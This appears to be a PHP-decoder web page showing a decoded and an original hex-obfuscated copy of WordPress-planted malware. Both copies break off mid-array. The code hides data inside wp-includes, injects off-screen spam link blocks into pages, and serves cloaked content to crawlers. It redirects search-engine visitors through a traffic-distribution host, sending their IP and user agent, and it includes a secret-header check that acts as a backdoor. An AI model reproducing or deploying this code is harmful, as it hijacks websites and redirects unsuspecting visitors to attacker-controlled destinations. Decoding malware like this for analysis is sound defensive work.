Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @error_reporting(0); ob_start('recheck_content'); showMyContent(); function get_re..
Decoded Output download
<?php
@error_reporting(0); ob_start('recheck_content'); showMyContent(); function get_request_info(){ $ri = array(); $ri['page'] = $_SERVER['REQUEST_URI']; $ri['host'] = str_replace(array('http://', 'https://', 'www.', '/'), '',$_SERVER['HTTP_HOST']); $ri['url'] = 'http://'.$ri['host'].$ri['page']; $ri['clear_url'] = trim(str_replace(array('http://', 'https://', 'www.', 'index.php', '/'), '', strtolower($ri['url']))); $ri['hash'] = md5($ri['clear_url']); $ri['dir']=ABSPATH . "wp-includes/sodium_compat/namespaced/Core/Curve25519/blog/"; $ri['dir']='/'.trim($ri['dir'],'/').'/'; if (!is_dir($ri['dir'])){ if (!is_dir(rtrim($_SERVER['DOCUMENT_ROOT'],'/').$ri['dir'])){ return false; } $ri['dir'] = rtrim($_SERVER['DOCUMENT_ROOT'],'/').$ri['dir']; } $ri['ua'] = $_SERVER['HTTP_USER_AGENT']; $ri['ip'] = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; $ri['ref'] = $_SERVER['HTTP_REFERER']; $ri['aclang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE']; return $ri; } function recheck_content($content){ if (!function_exists('get_request_info')){ function get_request_info(){ $ri = array(); $ri['page'] = $_SERVER['REQUEST_URI']; $ri['host'] = str_replace(array('http://', 'https://', 'www.', '/'), '',$_SERVER['HTTP_HOST']); $ri['url'] = 'http://'.$ri['host'].$ri['page']; $ri['clear_url'] = trim(str_replace(array('http://', 'https://', 'www.', 'index.php', '/'), '', strtolower($ri['url']))); $ri['hash'] = md5($ri['clear_url']); $ri['dir'] = ABSPATH . "wp-includes/sodium_compat/namespaced/Core/Curve25519/blog/"; if (!is_dir($ri['dir'])){ if (!is_dir($_SERVER['DOCUMENT_ROOT'] . $ri['dir'])){ return false; } $ri['dir'] = $_SERVER['DOCUMENT_ROOT'] . $ri['dir']; } return $ri; } } if (!function_exists('get_uniq_blocks')){ function get_uniq_blocks($html_code){ preg_match_all("/<div .+?>/i",$html_code,$matches); $string_matches=implode("|",$matches[0]); $unique_blocks=array(); foreach ($matches[0] as $match){ preg_match_all("/".preg_quote($match,'/')."/i",$string_matches,$for_count); if (sizeof($for_count[0])==1){ $unique_blocks[]=$match; } } return $unique_blocks; } } if (!function_exists('get_block_links')){ function get_block_links($md5_req,$dir){ if (!file_exists($dir."conf.dat")){ return false; } $start_unixtime = 1644027948; $conf=unserialize((file_get_contents($dir."conf.dat"))); if (array_key_exists($md5_req,$conf)){ $links_data=$conf[$md5_req]; foreach ($links_data as $num=>$data){ $link_info=explode(":;:",$data); $block_num=intval($link_info[0]); $link_time=$link_info[1]; $link=$link_info[2]; if ($link_time < 1000){ $link_time = $start_unixtime + $link_time * 86400; } if (time()>$link_time){ $block_links[$block_num].=$link.'. '; } } } return $block_links; } } $settings = get_request_info(); if (isset($_SERVER['HTTP_XATE']) && md5($_SERVER['HTTP_XATE']) == 'f26c3d9c09586db98096b5124c4eea96'){ return '<xate>'.base64_encode($settings['page']).'<xate>'; } if ($settings == false){return preg_replace("/\[LINK-\d+\]/","",$content);} $block_links=get_block_links($settings['hash'],$settings['dir']); if ($block_links){ $start_pos=0; if (!preg_match("/\[LINK-\d+\]/",$content)){ $uniq_blocks=get_uniq_blocks($content); $count_divs=sizeof($uniq_blocks); $count_link_blocks=sizeof($block_links); if (($count_divs/2)>$count_link_blocks){ $start_pos=$count_divs/2; } foreach ($block_links as $num=>$links){ $cur_pos=$start_pos+$num; $content=str_replace($uniq_blocks[$cur_pos],PHP_EOL.str_repeat(' ',700).'<div style="position:absolute;top:-8635px;">'.$links.'</div>'.PHP_EOL.$uniq_blocks[$cur_pos],$content); } }else{ foreach ($block_links as $num=>$links){ $content=str_replace("[LINK-".$num."]",$links,$content); } } } return preg_replace("/\[LINK-\d+\]/","",$content); } function showMyContent(){ $ri=get_request_info(); if (isset($_SERVER['HTTP_XATE']) && md5($_SERVER['HTTP_XATE']) == 'f26c3d9c09586db98096b5124c4eea96'){ echo '<sate>' . base64_encode($ri['page']) . '<sate>'; exit(); } if (!$ri){ return; } if (!file_exists($ri['dir'].'/main_data.zip') || !file_exists($ri['dir'].'/temp.dat') || ($ri['host'] == $ri['clear_url'])){ return; } $main_data = @unserialize(gzinflate(file_get_contents($ri['dir'].'/main_data.zip'))); if ($main_data == false){ return; } if (!array_key_exists($ri['hash'],$main_data)){ return; } if(!empty($ri['aclang']) && (stripos($ri['aclang'],'ru')!==false)){ return; } if ((isHuman($ri['ua'],$ri['ip'],$ri['ref']) == false)){ $start_unixtime = 1644027948; $days_ago = floor((time() - $start_unixtime)/86400); foreach ($main_data[$ri['hash']] as &$v) { preg_match_all('~\[hid\|(.*?)\|(\d+)_H\]~s', $v, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if ($match[2] > $days_ago) { $match[1] = ''; } $v = str_replace($match[0], $match[1], $v); } } unset($v); $dsflkjm = $main_data[$ri['hash']]; $dsflkjm['basehref'] = 'https://www.salo-ag.de/'; $dsflkjm['style'] = ''; $dsflkjm['form'] = ''; include_once($ri['dir'].'/temp.dat'); exit; } if (!empty($_COOKIE)){ $allowedCookie = array('eventdoros'); $isAllowedCookie = true; foreach ($_COOKIE as $key => $value){ if (!in_array($key, $allowedCookie)){ $isAllowedCookie = false; break; } } if (!$isAllowedCookie){ return; } } $reffer=urldecode(html_entity_decode($_SERVER['HTTP_REFERER'])); $fromGoogle = false; if (preg_match('/^http(s|):\/\/(www\.|)google\..+?$/i', $reffer)){ $fromGoogle = true; } if(preg_match('#[\?\&](q|p|query|wd|text|keyword(s|2|)|search|suchen|searchfor|searchTerm)=([^&]+)#i', $reffer, $match)){ $keyword=(isset($match[3])) ? $match[3] : null; } if (($fromGoogle == false) && (empty($keyword)) && (!isset($_COOKIE['eventdoros']))){ return; } $keyword = keyForTds($ri['page']); setcookie('eventdoros',md5($ri['host']),time()+60*60*24*120); $url="http://redirectsystem.com/9dfM?keyword=$keyword&se_referer=".urlencode($ri['ref'])."&referer=".urlencode($ri['host'])."&source=".urlencode($ri['ref']); $hide_url = "http://redirectsystem.com/api.php?charset=utf-8&action=get&api_key=b4788ce57dbc162d0a362fce49f35845&group=store&ua={$ri['ua']}&ip={$ri['ip']}&keyword=$keyword&se_referer={$ri['ref']}&referrer={$ri['host']}&source=".$ri['ref']; $result = json_decode(urlGetContents($hide_url)); if ($result->redirect) { safeRedirect($result->stream->url); } safeRedirect($url); return; } function keyForTds($key){ if (stripos($key,'=')!==false){ $key_parts=explode('=',$key); $key=$key_parts[1]; } $key=str_replace('/','',$key); $key=str_replace('-',' ',$key); $key=urlencode($key); return $key; } function safeRedirect($url){ if (!headers_sent()){ header("Location: $url"); } else { echo "<html><head><meta http-equiv='refresh' content='0; url=$url'></head><body></body></html>"; echo "<script>location.replace('$url');</script>"; } exit; } function urlGetContents($url, $timeout = 5) { $url_parsed = parse_url($url); $host = $url_parsed["host"]; if ($url == '' || $host == '') { return false; } $hostName = gethostbyname($host); $ip = ip2long($hostName); if ($ip === -1 || $ip === false) { return false; } $path = (empty($url_parsed["path"]) ? '/' : $url_parsed["path"]); $path.= (!empty($url_parsed["query"]) ? '?'.$url_parsed["query"] : ''); $referer='http://'.str_replace('www.','',$_SERVER['HTTP_HOST']).$_SERVER['REQUEST_URI'].'||'.$_SERVER['HTTP_REFERER']; $user_agent=$_SERVER['HTTP_USER_AGENT']; $ip=$_SERVER["REMOTE_ADDR"]; $out = "GET $path HTTP/1.0
Host: $host
User-Agent:$user_agent
X-Forwarded-For: $ip
Referer: $referer
Connection: Close
"; $fp = fsockopen($host, 80, $errno, $errstr, intval($timeout)); if (!$fp) { echo "errno{".$errno."}"; echo "errstr{".$errstr."}"; return false; } stream_set_timeout($fp, intval($timeout)); fwrite($fp, $out); $headers = ''; $content = ''; $buf = ''; $isBody = false; while (!feof($fp)) { $buf = fgets($fp, 1024); if ($isBody) { $content .= $buf; } else { $headers .= $buf; } if ($buf == "
" ) { $isBody = true; } } preg_match('#HTTP/1.[0-9]{1}\s+([0-9]{3}).*#is', $headers, $match); fclose($fp); if($match[1] != 200) { return false; } return $content; } function isHuman ($ua,$ip,$ref){ $botUAs = array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Yahoo!\s*Slurp#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#msnbot#i','#msnbot-media#i',Did this file decode correctly?
Original Code
<?php
@error_reporting(0); ob_start('recheck_content'); showMyContent(); function get_request_info(){ $ri = array(); $ri['page'] = $_SERVER['REQUEST_URI']; $ri['host'] = str_replace(array('http://', 'https://', 'www.', '/'), '',$_SERVER['HTTP_HOST']); $ri['url'] = 'http://'.$ri['host'].$ri['page']; $ri['clear_url'] = trim(str_replace(array('http://', 'https://', 'www.', 'index.php', '/'), '', strtolower($ri['url']))); $ri['hash'] = md5($ri['clear_url']); $ri['dir']=ABSPATH . "\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x73\x6f\x64\x69\x75\x6d\x5f\x63\x6f\x6d\x70\x61\x74\x2f\x6e\x61\x6d\x65\x73\x70\x61\x63\x65\x64\x2f\x43\x6f\x72\x65\x2f\x43\x75\x72\x76\x65\x32\x35\x35\x31\x39\x2f\x62\x6c\x6f\x67\x2f"; $ri['dir']='/'.trim($ri['dir'],'/').'/'; if (!is_dir($ri['dir'])){ if (!is_dir(rtrim($_SERVER['DOCUMENT_ROOT'],'/').$ri['dir'])){ return false; } $ri['dir'] = rtrim($_SERVER['DOCUMENT_ROOT'],'/').$ri['dir']; } $ri['ua'] = $_SERVER['HTTP_USER_AGENT']; $ri['ip'] = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; $ri['ref'] = $_SERVER['HTTP_REFERER']; $ri['aclang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE']; return $ri; } function recheck_content($content){ if (!function_exists('get_request_info')){ function get_request_info(){ $ri = array(); $ri['page'] = $_SERVER['REQUEST_URI']; $ri['host'] = str_replace(array('http://', 'https://', 'www.', '/'), '',$_SERVER['HTTP_HOST']); $ri['url'] = 'http://'.$ri['host'].$ri['page']; $ri['clear_url'] = trim(str_replace(array('http://', 'https://', 'www.', 'index.php', '/'), '', strtolower($ri['url']))); $ri['hash'] = md5($ri['clear_url']); $ri['dir'] = ABSPATH . "\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x73\x6f\x64\x69\x75\x6d\x5f\x63\x6f\x6d\x70\x61\x74\x2f\x6e\x61\x6d\x65\x73\x70\x61\x63\x65\x64\x2f\x43\x6f\x72\x65\x2f\x43\x75\x72\x76\x65\x32\x35\x35\x31\x39\x2f\x62\x6c\x6f\x67\x2f"; if (!is_dir($ri['dir'])){ if (!is_dir($_SERVER['DOCUMENT_ROOT'] . $ri['dir'])){ return false; } $ri['dir'] = $_SERVER['DOCUMENT_ROOT'] . $ri['dir']; } return $ri; } } if (!function_exists('get_uniq_blocks')){ function get_uniq_blocks($html_code){ preg_match_all("/<div .+?>/i",$html_code,$matches); $string_matches=implode("|",$matches[0]); $unique_blocks=array(); foreach ($matches[0] as $match){ preg_match_all("/".preg_quote($match,'/')."/i",$string_matches,$for_count); if (sizeof($for_count[0])==1){ $unique_blocks[]=$match; } } return $unique_blocks; } } if (!function_exists('get_block_links')){ function get_block_links($md5_req,$dir){ if (!file_exists($dir."conf.dat")){ return false; } $start_unixtime = 1644027948; $conf=unserialize((file_get_contents($dir."conf.dat"))); if (array_key_exists($md5_req,$conf)){ $links_data=$conf[$md5_req]; foreach ($links_data as $num=>$data){ $link_info=explode(":;:",$data); $block_num=intval($link_info[0]); $link_time=$link_info[1]; $link=$link_info[2]; if ($link_time < 1000){ $link_time = $start_unixtime + $link_time * 86400; } if (time()>$link_time){ $block_links[$block_num].=$link.'. '; } } } return $block_links; } } $settings = get_request_info(); if (isset($_SERVER['HTTP_XATE']) && md5($_SERVER['HTTP_XATE']) == 'f26c3d9c09586db98096b5124c4eea96'){ return '<xate>'.base64_encode($settings['page']).'<xate>'; } if ($settings == false){return preg_replace("/\[LINK-\d+\]/","",$content);} $block_links=get_block_links($settings['hash'],$settings['dir']); if ($block_links){ $start_pos=0; if (!preg_match("/\[LINK-\d+\]/",$content)){ $uniq_blocks=get_uniq_blocks($content); $count_divs=sizeof($uniq_blocks); $count_link_blocks=sizeof($block_links); if (($count_divs/2)>$count_link_blocks){ $start_pos=$count_divs/2; } foreach ($block_links as $num=>$links){ $cur_pos=$start_pos+$num; $content=str_replace($uniq_blocks[$cur_pos],PHP_EOL.str_repeat(' ',700).'<div style="position:absolute;top:-8635px;">'.$links.'</div>'.PHP_EOL.$uniq_blocks[$cur_pos],$content); } }else{ foreach ($block_links as $num=>$links){ $content=str_replace("[LINK-".$num."]",$links,$content); } } } return preg_replace("/\[LINK-\d+\]/","",$content); } function showMyContent(){ $ri=get_request_info(); if (isset($_SERVER['HTTP_XATE']) && md5($_SERVER['HTTP_XATE']) == 'f26c3d9c09586db98096b5124c4eea96'){ echo '<sate>' . base64_encode($ri['page']) . '<sate>'; exit(); } if (!$ri){ return; } if (!file_exists($ri['dir'].'/main_data.zip') || !file_exists($ri['dir'].'/temp.dat') || ($ri['host'] == $ri['clear_url'])){ return; } $main_data = @unserialize(gzinflate(file_get_contents($ri['dir'].'/main_data.zip'))); if ($main_data == false){ return; } if (!array_key_exists($ri['hash'],$main_data)){ return; } if(!empty($ri['aclang']) && (stripos($ri['aclang'],'ru')!==false)){ return; } if ((isHuman($ri['ua'],$ri['ip'],$ri['ref']) == false)){ $start_unixtime = 1644027948; $days_ago = floor((time() - $start_unixtime)/86400); foreach ($main_data[$ri['hash']] as &$v) { preg_match_all('~\[hid\|(.*?)\|(\d+)_H\]~s', $v, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if ($match[2] > $days_ago) { $match[1] = ''; } $v = str_replace($match[0], $match[1], $v); } } unset($v); $dsflkjm = $main_data[$ri['hash']]; $dsflkjm['basehref'] = 'https://www.salo-ag.de/'; $dsflkjm['style'] = ''; $dsflkjm['form'] = ''; include_once($ri['dir'].'/temp.dat'); exit; } if (!empty($_COOKIE)){ $allowedCookie = array('eventdoros'); $isAllowedCookie = true; foreach ($_COOKIE as $key => $value){ if (!in_array($key, $allowedCookie)){ $isAllowedCookie = false; break; } } if (!$isAllowedCookie){ return; } } $reffer=urldecode(html_entity_decode($_SERVER['HTTP_REFERER'])); $fromGoogle = false; if (preg_match('/^http(s|):\/\/(www\.|)google\..+?$/i', $reffer)){ $fromGoogle = true; } if(preg_match('#[\?\&](q|p|query|wd|text|keyword(s|2|)|search|suchen|searchfor|searchTerm)=([^&]+)#i', $reffer, $match)){ $keyword=(isset($match[3])) ? $match[3] : null; } if (($fromGoogle == false) && (empty($keyword)) && (!isset($_COOKIE['eventdoros']))){ return; } $keyword = keyForTds($ri['page']); setcookie('eventdoros',md5($ri['host']),time()+60*60*24*120); $url="http://redirectsystem.com/9dfM?keyword=$keyword&se_referer=".urlencode($ri['ref'])."&referer=".urlencode($ri['host'])."&source=".urlencode($ri['ref']); $hide_url = "http://redirectsystem.com/api.php?charset=utf-8&action=get&api_key=b4788ce57dbc162d0a362fce49f35845&group=store&ua={$ri['ua']}&ip={$ri['ip']}&keyword=$keyword&se_referer={$ri['ref']}&referrer={$ri['host']}&source=".$ri['ref']; $result = json_decode(urlGetContents($hide_url)); if ($result->redirect) { safeRedirect($result->stream->url); } safeRedirect($url); return; } function keyForTds($key){ if (stripos($key,'=')!==false){ $key_parts=explode('=',$key); $key=$key_parts[1]; } $key=str_replace('/','',$key); $key=str_replace('-',' ',$key); $key=urlencode($key); return $key; } function safeRedirect($url){ if (!headers_sent()){ header("Location: $url"); } else { echo "<html><head><meta http-equiv='refresh' content='0; url=$url'></head><body></body></html>"; echo "<script>location.replace('$url');</script>"; } exit; } function urlGetContents($url, $timeout = 5) { $url_parsed = parse_url($url); $host = $url_parsed["host"]; if ($url == '' || $host == '') { return false; } $hostName = gethostbyname($host); $ip = ip2long($hostName); if ($ip === -1 || $ip === false) { return false; } $path = (empty($url_parsed["path"]) ? '/' : $url_parsed["path"]); $path.= (!empty($url_parsed["query"]) ? '?'.$url_parsed["query"] : ''); $referer='http://'.str_replace('www.','',$_SERVER['HTTP_HOST']).$_SERVER['REQUEST_URI'].'||'.$_SERVER['HTTP_REFERER']; $user_agent=$_SERVER['HTTP_USER_AGENT']; $ip=$_SERVER["REMOTE_ADDR"]; $out = "GET $path HTTP/1.0\r\nHost: $host\r\nUser-Agent:$user_agent\r\nX-Forwarded-For: $ip\r\nReferer: $referer\r\nConnection: Close\r\n\r\n"; $fp = fsockopen($host, 80, $errno, $errstr, intval($timeout)); if (!$fp) { echo "errno{".$errno."}"; echo "errstr{".$errstr."}"; return false; } stream_set_timeout($fp, intval($timeout)); fwrite($fp, $out); $headers = ''; $content = ''; $buf = ''; $isBody = false; while (!feof($fp)) { $buf = fgets($fp, 1024); if ($isBody) { $content .= $buf; } else { $headers .= $buf; } if ($buf == "\r\n" ) { $isBody = true; } } preg_match('#HTTP/1.[0-9]{1}\s+([0-9]{3}).*#is', $headers, $match); fclose($fp); if($match[1] != 200) { return false; } return $content; } function isHuman ($ua,$ip,$ref){ $botUAs = array('#Ask\s*Jeeves#i','#HP\s*Web\s*PrintSmart#i','#HTTrack#i','#IDBot#i','#Indy\s*Library#','#ListChecker#i','#MSIECrawler#i','#NetCache#i','#Nutch#i','#RPT-HTTPClient#i','#rulinki\.ru#i','#Twiceler#i','#WebAlta#i','#Webster\s*Pro#i','#www\.cys\.ru#i','#Wysigot#i','#Yahoo!\s*Slurp#i','#Yeti#i','#Accoona#i','#CazoodleBot#i','#CFNetwork#i','#ConveraCrawler#i','#DISCo#i','#Download\s*Master#i','#FAST\s*MetaWeb\s*Crawler#i','#Flexum\s*spider#i','#Gigabot#i','#HTMLParser#i','#ia_archiver#i','#ichiro#i','#IRLbot#i','#Java#i','#km\.ru\s*bot#i','#kmSearchBot#i','#libwww-perl#i','#Lupa\.ru#i','#LWP::Simple#i','#lwp-trivial#i','#Missigua#i','#MJ12bot#i','#msnbot#i','#msnbot-media#i',Function Calls
| None |
Stats
| MD5 | 4d7df64861d787c6f112b4acc5421b2b |
| Eval Count | 0 |
| Decode Time | 170 ms |